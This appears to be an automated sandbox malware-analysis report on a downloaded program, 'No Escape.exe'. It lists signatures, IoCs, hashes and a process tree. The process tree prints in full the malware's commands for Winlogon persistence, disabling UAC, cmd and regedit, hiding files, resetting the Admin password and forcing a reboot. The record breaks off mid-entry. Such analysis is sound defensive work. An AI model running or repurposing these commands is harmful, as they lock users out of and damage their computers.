Analysis
-
max time kernel
34s -
max time network
35s -
platform
windows10-2004_x64 -
resource
win10v2004-20250313-en -
resource tags
arch:x64arch:x86image:win10v2004-20250313-enlocale:en-usos:windows10-2004-x64system -
submitted
28/03/2025, 20:43
Static task
static1
Behavioral task
behavioral1
Sample
image_2025-03-28_204056178.png
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
image_2025-03-28_204056178.png
Resource
win10v2004-20250313-en
Errors
General
-
Target
image_2025-03-28_204056178.png
-
Size
7KB
-
MD5
daf0a316fba7e913fe8305e4c8a53205
-
SHA1
0556975b72209b8067fd5b09ae21fa9c1bade785
-
SHA256
fe1fd2bb77618fa06e548283188cf3696acc9dd2d8a4c3f4e03560f3dddc3103
-
SHA512
e6fdaa9709f1a5a2a28eedeff4934f6060086f5eb60d4c9d576957c52d2c64fa43f475d44ceeb42cd5138a6dcafdadfef273817da1b19a3ab21e8ba1316f8f6e
-
SSDEEP
96:X2fEYr0GPuMnGuwrwfHYF9scngjmij+cf1uq9cy+Sxwn2xcViPvcGcos2P/sIZw+:mEazpG/Ok9Xg0y9C2XzPjP/ccVas3Hwc
Malware Config
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe,C:\\launch.exe" reg.exe -
UAC bypass 3 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Disables RegEdit via registry modification 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" reg.exe -
Downloads MZ/PE file 1 IoCs
flow pid Process 185 2528 chrome.exe -
Sets file to hidden 1 TTPs 2 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 4876 attrib.exe 1204 attrib.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation No Escape.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation wscript.exe -
Executes dropped EXE 1 IoCs
pid Process 3264 No Escape.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 184 raw.githubusercontent.com 185 raw.githubusercontent.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\Desktop\wallpaper = "C:\\hello.jpg" reg.exe -
Drops file in Program Files directory 12 IoCs
description ioc Process File created C:\Program Files (x86)\date.txt No Escape.exe File created C:\Program Files (x86)\ No Escape.exe File created C:\Program Files (x86)\launch.exe No Escape.exe File created C:\Program Files (x86)\msg.exe No Escape.exe File created C:\Program Files (x86)\mypc.exe No Escape.exe File opened for modification C:\Program Files (x86)\ No Escape.exe File created C:\Program Files (x86)\erode.exe No Escape.exe File created C:\Program Files (x86)\hello.bat No Escape.exe File created C:\Program Files (x86)\hello.jpg No Escape.exe File created C:\Program Files (x86)\hello.reg No Escape.exe File created C:\Program Files (x86)\mover.exe No Escape.exe File created C:\Program Files (x86)\shaking.exe No Escape.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language No Escape.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier chrome.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Modifies data under HKEY_USERS 17 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" LogonUI.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133876682298648668" chrome.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" LogonUI.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "232" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 5732 reg.exe -
Runs .reg file with regedit 1 IoCs
pid Process 1988 regedit.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 5900 mspaint.exe 5900 mspaint.exe 3532 chrome.exe 3532 chrome.exe 3532 chrome.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
pid Process 3532 chrome.exe 3532 chrome.exe 3532 chrome.exe 3532 chrome.exe 3532 chrome.exe 3532 chrome.exe 3532 chrome.exe -
Suspicious use of AdjustPrivilegeToken 56 IoCs
description pid Process Token: SeShutdownPrivilege 3532 chrome.exe Token: SeCreatePagefilePrivilege 3532 chrome.exe Token: SeShutdownPrivilege 3532 chrome.exe Token: SeCreatePagefilePrivilege 3532 chrome.exe Token: SeShutdownPrivilege 3532 chrome.exe Token: SeCreatePagefilePrivilege 3532 chrome.exe Token: SeShutdownPrivilege 3532 chrome.exe Token: SeCreatePagefilePrivilege 3532 chrome.exe Token: SeShutdownPrivilege 3532 chrome.exe Token: SeCreatePagefilePrivilege 3532 chrome.exe Token: SeShutdownPrivilege 3532 chrome.exe Token: SeCreatePagefilePrivilege 3532 chrome.exe Token: SeShutdownPrivilege 3532 chrome.exe Token: SeCreatePagefilePrivilege 3532 chrome.exe Token: SeShutdownPrivilege 3532 chrome.exe Token: SeCreatePagefilePrivilege 3532 chrome.exe Token: SeShutdownPrivilege 3532 chrome.exe Token: SeCreatePagefilePrivilege 3532 chrome.exe Token: SeShutdownPrivilege 3532 chrome.exe Token: SeCreatePagefilePrivilege 3532 chrome.exe Token: SeShutdownPrivilege 3532 chrome.exe Token: SeCreatePagefilePrivilege 3532 chrome.exe Token: SeShutdownPrivilege 3532 chrome.exe Token: SeCreatePagefilePrivilege 3532 chrome.exe Token: SeShutdownPrivilege 3532 chrome.exe Token: SeCreatePagefilePrivilege 3532 chrome.exe Token: SeShutdownPrivilege 3532 chrome.exe Token: SeCreatePagefilePrivilege 3532 chrome.exe Token: SeShutdownPrivilege 3532 chrome.exe Token: SeCreatePagefilePrivilege 3532 chrome.exe Token: SeShutdownPrivilege 3532 chrome.exe Token: SeCreatePagefilePrivilege 3532 chrome.exe Token: SeShutdownPrivilege 3532 chrome.exe Token: SeCreatePagefilePrivilege 3532 chrome.exe Token: SeShutdownPrivilege 3532 chrome.exe Token: SeCreatePagefilePrivilege 3532 chrome.exe Token: SeShutdownPrivilege 3532 chrome.exe Token: SeCreatePagefilePrivilege 3532 chrome.exe Token: SeShutdownPrivilege 3532 chrome.exe Token: SeCreatePagefilePrivilege 3532 chrome.exe Token: SeShutdownPrivilege 3532 chrome.exe Token: SeCreatePagefilePrivilege 3532 chrome.exe Token: SeShutdownPrivilege 3532 chrome.exe Token: SeCreatePagefilePrivilege 3532 chrome.exe Token: SeShutdownPrivilege 3532 chrome.exe Token: SeCreatePagefilePrivilege 3532 chrome.exe Token: SeShutdownPrivilege 3532 chrome.exe Token: SeCreatePagefilePrivilege 3532 chrome.exe Token: SeShutdownPrivilege 3532 chrome.exe Token: SeCreatePagefilePrivilege 3532 chrome.exe Token: SeShutdownPrivilege 3532 chrome.exe Token: SeCreatePagefilePrivilege 3532 chrome.exe Token: SeShutdownPrivilege 3532 chrome.exe Token: SeCreatePagefilePrivilege 3532 chrome.exe Token: SeShutdownPrivilege 5616 shutdown.exe Token: SeRemoteShutdownPrivilege 5616 shutdown.exe -
Suspicious use of FindShellTrayWindow 34 IoCs
pid Process 3532 chrome.exe 3532 chrome.exe 3532 chrome.exe 3532 chrome.exe 3532 chrome.exe 3532 chrome.exe 3532 chrome.exe 3532 chrome.exe 3532 chrome.exe 3532 chrome.exe 3532 chrome.exe 3532 chrome.exe 3532 chrome.exe 3532 chrome.exe 3532 chrome.exe 3532 chrome.exe 3532 chrome.exe 3532 chrome.exe 3532 chrome.exe 3532 chrome.exe 3532 chrome.exe 3532 chrome.exe 3532 chrome.exe 3532 chrome.exe 3532 chrome.exe 3532 chrome.exe 3532 chrome.exe 3532 chrome.exe 3532 chrome.exe 3532 chrome.exe 3532 chrome.exe 3532 chrome.exe 3532 chrome.exe 3532 chrome.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 3532 chrome.exe 3532 chrome.exe 3532 chrome.exe 3532 chrome.exe 3532 chrome.exe 3532 chrome.exe 3532 chrome.exe 3532 chrome.exe 3532 chrome.exe 3532 chrome.exe 3532 chrome.exe 3532 chrome.exe 3532 chrome.exe 3532 chrome.exe 3532 chrome.exe 3532 chrome.exe 3532 chrome.exe 3532 chrome.exe 3532 chrome.exe 3532 chrome.exe 3532 chrome.exe 3532 chrome.exe 3532 chrome.exe 3532 chrome.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 5900 mspaint.exe 5900 mspaint.exe 5900 mspaint.exe 5900 mspaint.exe 2408 LogonUI.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3532 wrote to memory of 3332 3532 chrome.exe 101 PID 3532 wrote to memory of 3332 3532 chrome.exe 101 PID 3532 wrote to memory of 5580 3532 chrome.exe 103 PID 3532 wrote to memory of 5580 3532 chrome.exe 103 PID 3532 wrote to memory of 2528 3532 chrome.exe 102 PID 3532 wrote to memory of 2528 3532 chrome.exe 102 PID 3532 wrote to memory of 5580 3532 chrome.exe 103 PID 3532 wrote to memory of 5580 3532 chrome.exe 103 PID 3532 wrote to memory of 5580 3532 chrome.exe 103 PID 3532 wrote to memory of 5580 3532 chrome.exe 103 PID 3532 wrote to memory of 5580 3532 chrome.exe 103 PID 3532 wrote to memory of 5580 3532 chrome.exe 103 PID 3532 wrote to memory of 5580 3532 chrome.exe 103 PID 3532 wrote to memory of 5580 3532 chrome.exe 103 PID 3532 wrote to memory of 5580 3532 chrome.exe 103 PID 3532 wrote to memory of 5580 3532 chrome.exe 103 PID 3532 wrote to memory of 5580 3532 chrome.exe 103 PID 3532 wrote to memory of 5580 3532 chrome.exe 103 PID 3532 wrote to memory of 5580 3532 chrome.exe 103 PID 3532 wrote to memory of 5580 3532 chrome.exe 103 PID 3532 wrote to memory of 5580 3532 chrome.exe 103 PID 3532 wrote to memory of 5580 3532 chrome.exe 103 PID 3532 wrote to memory of 5580 3532 chrome.exe 103 PID 3532 wrote to memory of 5580 3532 chrome.exe 103 PID 3532 wrote to memory of 5580 3532 chrome.exe 103 PID 3532 wrote to memory of 5580 3532 chrome.exe 103 PID 3532 wrote to memory of 5580 3532 chrome.exe 103 PID 3532 wrote to memory of 5580 3532 chrome.exe 103 PID 3532 wrote to memory of 5580 3532 chrome.exe 103 PID 3532 wrote to memory of 5580 3532 chrome.exe 103 PID 3532 wrote to memory of 5580 3532 chrome.exe 103 PID 3532 wrote to memory of 5580 3532 chrome.exe 103 PID 3532 wrote to memory of 5580 3532 chrome.exe 103 PID 3532 wrote to memory of 5580 3532 chrome.exe 103 PID 3532 wrote to memory of 2196 3532 chrome.exe 104 PID 3532 wrote to memory of 2196 3532 chrome.exe 104 PID 3532 wrote to memory of 2196 3532 chrome.exe 104 PID 3532 wrote to memory of 2196 3532 chrome.exe 104 PID 3532 wrote to memory of 2196 3532 chrome.exe 104 PID 3532 wrote to memory of 2196 3532 chrome.exe 104 PID 3532 wrote to memory of 2196 3532 chrome.exe 104 PID 3532 wrote to memory of 2196 3532 chrome.exe 104 PID 3532 wrote to memory of 2196 3532 chrome.exe 104 PID 3532 wrote to memory of 2196 3532 chrome.exe 104 PID 3532 wrote to memory of 2196 3532 chrome.exe 104 PID 3532 wrote to memory of 2196 3532 chrome.exe 104 PID 3532 wrote to memory of 2196 3532 chrome.exe 104 PID 3532 wrote to memory of 2196 3532 chrome.exe 104 PID 3532 wrote to memory of 2196 3532 chrome.exe 104 PID 3532 wrote to memory of 2196 3532 chrome.exe 104 PID 3532 wrote to memory of 2196 3532 chrome.exe 104 PID 3532 wrote to memory of 2196 3532 chrome.exe 104 PID 3532 wrote to memory of 2196 3532 chrome.exe 104 PID 3532 wrote to memory of 2196 3532 chrome.exe 104 PID 3532 wrote to memory of 2196 3532 chrome.exe 104 PID 3532 wrote to memory of 2196 3532 chrome.exe 104 PID 3532 wrote to memory of 2196 3532 chrome.exe 104 PID 3532 wrote to memory of 2196 3532 chrome.exe 104 PID 3532 wrote to memory of 2196 3532 chrome.exe 104 PID 3532 wrote to memory of 2196 3532 chrome.exe 104 PID 3532 wrote to memory of 2196 3532 chrome.exe 104 PID 3532 wrote to memory of 2196 3532 chrome.exe 104 PID 3532 wrote to memory of 2196 3532 chrome.exe 104 PID 3532 wrote to memory of 2196 3532 chrome.exe 104 -
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 4876 attrib.exe 1204 attrib.exe
Processes
-
C:\Windows\system32\mspaint.exe"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\AppData\Local\Temp\image_2025-03-28_204056178.png"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:5900
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService1⤵PID:2500
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3532 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffbdefadcf8,0x7ffbdefadd04,0x7ffbdefadd102⤵PID:3332
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1592,i,11402527223974652856,9572677078984230954,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2220 /prefetch:32⤵
- Downloads MZ/PE file
PID:2528
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2120,i,11402527223974652856,9572677078984230954,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2116 /prefetch:22⤵PID:5580
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2424,i,11402527223974652856,9572677078984230954,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2400 /prefetch:82⤵PID:2196
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3088,i,11402527223974652856,9572677078984230954,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3108 /prefetch:12⤵PID:3272
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3136,i,11402527223974652856,9572677078984230954,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3176 /prefetch:12⤵PID:3140
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4440,i,11402527223974652856,9572677078984230954,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4460 /prefetch:22⤵PID:3340
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4716,i,11402527223974652856,9572677078984230954,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4732 /prefetch:12⤵PID:5092
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5316,i,11402527223974652856,9572677078984230954,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5376 /prefetch:82⤵PID:5244
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5580,i,11402527223974652856,9572677078984230954,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5592 /prefetch:82⤵PID:2268
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5804,i,11402527223974652856,9572677078984230954,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5588 /prefetch:82⤵PID:2452
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5948,i,11402527223974652856,9572677078984230954,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5656 /prefetch:82⤵PID:2504
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5952,i,11402527223974652856,9572677078984230954,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5816 /prefetch:82⤵PID:1740
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5944,i,11402527223974652856,9572677078984230954,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5968 /prefetch:82⤵PID:928
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5912,i,11402527223974652856,9572677078984230954,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5428 /prefetch:12⤵PID:5716
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=3192,i,11402527223974652856,9572677078984230954,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3052 /prefetch:12⤵PID:5012
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=6048,i,11402527223974652856,9572677078984230954,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=6076 /prefetch:12⤵PID:5968
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=6200,i,11402527223974652856,9572677078984230954,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=6216 /prefetch:82⤵PID:5584
-
-
C:\Users\Admin\Downloads\No Escape.exe"C:\Users\Admin\Downloads\No Escape.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:3264 -
C:\Windows\system32\wscript.exe"C:\Windows\sysnative\wscript.exe" C:\Users\Admin\AppData\Local\Temp\2016.tmp\2017.tmp\2018.vbs //Nologo3⤵
- Checks computer location settings
PID:2956 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\hello.bat" "4⤵PID:2916
-
C:\Windows\system32\attrib.exeattrib +s +h C:\msg.exe5⤵
- Sets file to hidden
- Views/modifies file attributes
PID:4876
-
-
C:\Windows\system32\attrib.exeattrib +s +h C:\launch.exe5⤵
- Sets file to hidden
- Views/modifies file attributes
PID:1204
-
-
C:\Windows\regedit.exeregedit /s hello.reg5⤵
- Runs .reg file with regedit
PID:1988
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System /v DisableLogonBackgroundImage /t REG_DWORD /d 15⤵PID:2940
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d C:\Windows\system32\userinit.exe,C:\launch.exe /f5⤵
- Modifies WinLogon for persistence
PID:2776
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\control panel\desktop" /v wallpaper /t REG_SZ /d C:\hello.jpg /f5⤵
- Sets desktop wallpaper using registry
PID:1388
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 15⤵PID:436
-
-
C:\Windows\system32\reg.exereg ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f5⤵
- UAC bypass
PID:4436
-
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 25⤵PID:5352
-
-
C:\Windows\system32\reg.exeREG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f5⤵
- Disables RegEdit via registry modification
- Modifies registry key
PID:5732
-
-
C:\Windows\system32\net.exenet user Admin death5⤵PID:1436
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user Admin death6⤵PID:3084
-
-
-
C:\Windows\system32\shutdown.exeshutdown /t 0 /r5⤵
- Suspicious use of AdjustPrivilegeToken
PID:5616
-
-
-
-
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:5464
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:2120
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa3907855 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:2408
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Hide Artifacts
2Hidden Files and Directories
2Impair Defenses
1Disable or Modify Tools
1Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
120B
MD5255a8e245b6ad378558b90cbe3dbc3d0
SHA16eb73f9f2034c113a2a6b1aab9a440a21928cfc2
SHA256d3195bde888f9b8a71f2eb840222f1586b652d0ede9f39841a180ead03633ca9
SHA51267e03d7bffa0dec32535b6da46d5b7f38d94a7c9a231aa2fa625b81485d41c1ecac95b08fe5b7a605fcfe1c7e37c55ee716c9045df90ea6e030b86e52ec09edf
-
Filesize
1KB
MD5b86fddd2b764f079615be5d4dc3e158d
SHA12510479054db1fe52cc2dcd3c7033d91204cb367
SHA2562b2114784d15b0b0d5475256851b4d0d4da7181198c2a93a304ecedb98eaf091
SHA512915363bc9f6e665358c8d25f5f5f51d64c53cb755be999013217162b126705ce641ea809047bc84511db7e3e383b848ec3932924baa8926d51a51d0037a5ca63
-
Filesize
110KB
MD5057ea45c364eb2994808a47b118556a2
SHA11d48c9c15ea5548af1475b5a369a4f7b8db42858
SHA2566e1115188aa00fb5ff031899100bacb0d34819707e069bca3eb53935ebb39836
SHA512582c7ecf2d0c33c8706ff3f39aa926780aa8f0dc0ff5d563905a5100254b81b89def22206abee0871ab339a3d463de9e6ec1782d92198e8f386f173654b6e760
-
Filesize
